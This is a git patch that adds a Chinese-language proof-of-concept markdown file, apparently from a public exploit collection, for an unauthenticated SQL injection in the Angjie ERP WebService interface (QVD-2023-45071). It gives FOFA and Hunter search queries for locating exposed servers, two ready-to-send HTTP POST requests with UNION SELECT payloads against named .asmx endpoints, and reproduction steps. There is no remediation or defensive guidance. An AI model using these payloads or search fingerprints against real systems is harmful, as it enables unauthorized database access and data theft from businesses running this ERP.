From 54e9893c18fcc3127880a27fb7610c2c6cf8c503 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 24 Nov 2023 19:35:06 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=98=82=E6=8D=B7ERP=20WebService?=
 =?UTF-8?q?=E6=8E=A5=E5=8F=A3=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E(QV?=
 =?UTF-8?q?D-2023-45071).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 ...ebService接口 SQL注入漏洞(QVD-2023-45071).md | 56 +++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md
diff --git a/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md b/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md
new file mode 100644
index 0000000..cd9ed16
--- /dev/null
+++ b/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md
@@ -0,0 +1,56 @@
+## 昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071)
+ 昂捷ERP WebService接口 存在SQL注入漏洞,未经身份验证的攻击者可以利用该漏洞泄露系统敏感信息。
+
+## fofa
+```
+body="CheckSilverlightInstalled"
+```
+
+## hunter
+```
+web.body="CheckSilverlightInstalled"
+```
+
+## SQL注入点1 /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx
+```
+POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
+Host: xxx.xxx.xxx.xxx:8008
+Content-Type: text/xml;
+charset=utf-8
+Content-Length: 482
+
+SOAPAction: "http://tempuri.org/GetOSpById"
+string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj
+```
+
+## SQL注入点2 /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx
+```
+POST /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx HTTP/1.1
+Host: xxx.xxx.xxx.xxx:8008
+Content-Type: text/xml;
+charset=utf-8
+Content-Length: 482
+
+SOAPAction: "http://tempuri.org/GetOSpById"
+string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj
+```
+
+## 漏洞复现
+访问漏洞点存在的地址
+
+http://xxx.xxx.xxx.xxx:9012/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx
+
+在地址后面加上?wsdl
+
+http://xxx.xxx.xxx.xxx:8123/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx?wsdl
+
+![image](https://github.com/wy876/POC/assets/139549762/a0b95351-845e-49c5-ba1e-8831cf85df9e)
+
+使用wsdler拓展工具解析
+
+![image](https://github.com/wy876/POC/assets/139549762/0537ac47-e89a-41fa-b925-cca83fba75ae)
+
+解析完成之后,即可对这些接口进行测试
+
+![image](https://github.com/wy876/POC/assets/139549762/c1206032-8405-40e4-8ab4-69a68ee22d7f)
+